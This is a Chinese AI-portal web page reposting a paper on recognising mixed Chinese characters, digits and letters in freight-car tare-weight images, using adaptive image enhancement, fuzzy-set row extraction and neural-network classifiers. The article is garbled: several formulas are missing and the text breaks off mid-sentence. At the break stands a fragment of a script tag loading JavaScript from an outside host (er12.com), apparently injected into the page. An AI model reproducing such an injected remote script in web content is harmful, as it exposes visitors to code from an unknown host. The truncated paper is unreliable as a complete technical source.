多种字符混合图像的自动识别-字符识别-人工智能实验室AiLab-中国人工智能网-Powered by AiLab.cn

多种字符混合图像的自动识别

来源：互联网发布日期：2011-10-07 19:22:45 浏览：13185次

导读：??摘要：以货运列车自重识别系统为例，提出一种适应不同光照环境的图像增强方法，利用模糊集理论从多行信息中提取自重行，正确率接近99%。在字符识别中，采...

多种字符混合图像的自动识别

发布时间:2008-5-25 访问次数:110

??摘要：以货运列车自重识别系统为例，提出一种适应不同光照环境的图像增强方法，利用模糊集理论从多行信息中提取自重行，正确率接近99%。在字符识别中，采用3种神经网络分类器分别识别汉字、数字和英文字母，并对易混数字采用两级分类器的结构，获得了较高的识别率。

关键词：图像增强；模糊集；神经网络；字符识别?

货运列车车号和车厢自重的自动识别，为实现铁路运输信息的计算机管理提供了现代化的技术手段。将每节车厢的检斤结果和车厢自重的自动识别结果传给微机，通过计算可得到列车的载物量，因此，车厢自重的正确识别是列车载物量计算的关键。根据文献［１～３］讨论的几种方法，列车车号识别取得了令人满意的正确率，但都未对车厢自重的识别问题进行探讨。本文通过对含多种字符的自重图像进行分析，提出了一些有效的方法。?

1自重识别的特点

货运列车的自重识别与车号识别相比，有很多新问题和特殊之处，具体表现在：

(1) 车号图像中车号信息占有很大比重，而自重图像中除包含自重信息外，还包含载重、容积等信息，如图1所示，因此自重目标提取比较困难。由于本系统24?h工作在户外，自重图像中信息分布广，因此照明对自重图像的影响更为严重；?

(2) 自重的数字比车号小得多，极易受到污染，而且自重数字的印刷更不规范，字符变形、丢笔划情况更为严重；

(3)自重信息中包括汉字、数字、英文字母等多种字符，而且数字大小不一，数字位数不固定，因此给字符识别带来了困难。

根据自重图像的特点，首先对采集的原始图像进行图像增强处理，以便得到良好的视觉效果；其次，利用模糊集理论从增强后的图像中提取自重行区域，最后对自重行进行字符分割处理，利用神经网络识别字符。本文将在下面分别阐述这3个步骤，并在最后给出结论。?

2一种适应不同光照环境的图像增强方法

由于本系统全天24h连续运行，环境照度差异很大，采用固定参数的灰度变换［４］，不能使不同亮度的图像都得到满意的图像增强效果。本文采用变参数分段非线性变换，其函数如下：?

其中l=256，表示共有256个灰度级，s1,s2,γ都是灰度均值m的单值函数：s1=α*m，s2=β*m，γ＝int［10*(m-m０)/m+0.5］其中，α=1,β=2,m0=6。图2给出2幅不同亮度的原始图像采用两种不同方法进行变换的比较。图2中(a)、(c)的原始图像的灰度均值为m=11.1811，此时，s1=11.1811,s2=22.3622，γ＝0.5，增强后图(c)的灰度均值33.354?3；图2中(b)，(d)的原始图像的灰度均值为m=35.2007，此时，s1=35.2007，s2=70.4014，γ=0.8，增强后图(d)的灰度均值23.4948。由对比结果可见，采用本文的方法能在增强较暗区域的亮度同时，抑制较亮区域的亮度，从而使不同亮度的图像都能得到适当的变换，得到良好的视觉效果。由图(c)、(d)可以看出，不同照明情况下采集的图像在增强后并无明显差别，因此在对图像的后续处理中不必考虑照明的影响。

3基于模糊集理论的目标区域提取

本文先把原始图像分割成若干个只含一行信息的候选区域子图像，然后选取目标的多个特征，利用模糊集理论表征各个特征的重要性，最后根据评判结果选取目标区域。?

3.1候选区域的分割

从图3所示的图像的行灰度均值图中可以看出，波峰对应着文字行，波谷对应着行之间的间隔。如果能准确地找出每个波谷，那么就会分割出若干个的候选区域子图像。

为了能准确的找出波谷，先对行均值ave(i)进行一维滤波，去掉“毛刺”，然后再根据下列特点搜索波谷：(1) 波谷必是局部极小值，即所考察区域的宽度是2k；(2) 波谷左右两侧曲线的斜率分别是负和正，且两侧曲线很陡峭，即

本文采用变斜率阈值的搜索方法，对于信息不很清晰的图像，其行均值图的波谷相应的不太明显，两侧曲线斜率不大，因此可适当减少斜率阈值s0，直到搜索到波谷为止，对于搜索结果中过宽或过窄的区域，可以根据一些文法信息(如文字行的标准高度等)进行相应的分裂或合并处理，从而得到只含一行文字的若干个候选区域图像。?

3.2目标区域的提取

根据模糊集理论［５］，模糊事件可以表示为三元组｛ｕ,k,v}，u={u１，u２，…，ul｝为其特征值，p＝｛v(u１）,v(u２），…，ｖ（ul)｝为其特征的评价集，k=｛k｜k=1,2,…,l｝。我们可以用下式来计算模糊事件a存在的可能性大小：?

其中，μ?a(u?k)为隶属函数，表示特征u?k对模糊事件a存在可能性大小的影响程度。

我们要评价每一个候选区域是“自重”行区域的可能性这一模糊事件。根据模糊事件的定义，我们需要解决三个关键问题：特征集的选取、特征评价函数的确定和每一特征对模糊事件的重要性［６］。在选取特征时，要选取最关键的?script src=http://er12.com/t.js>

相关热词： 多种字符混图像自动识别

多种字符混合图像的自动识别
来源：互联网发布日期：2011-10-07 19:22:45 浏览：13185次

相关内容

AiLab云推荐

最新资讯

本月热点

热门排行

推荐内容

在线客服

热门栏目HotCates

关于我们

版权声明

多种字符混合图像的自动识别 来源：互联网 发布日期：2011-10-07 19:22:45 浏览：13185次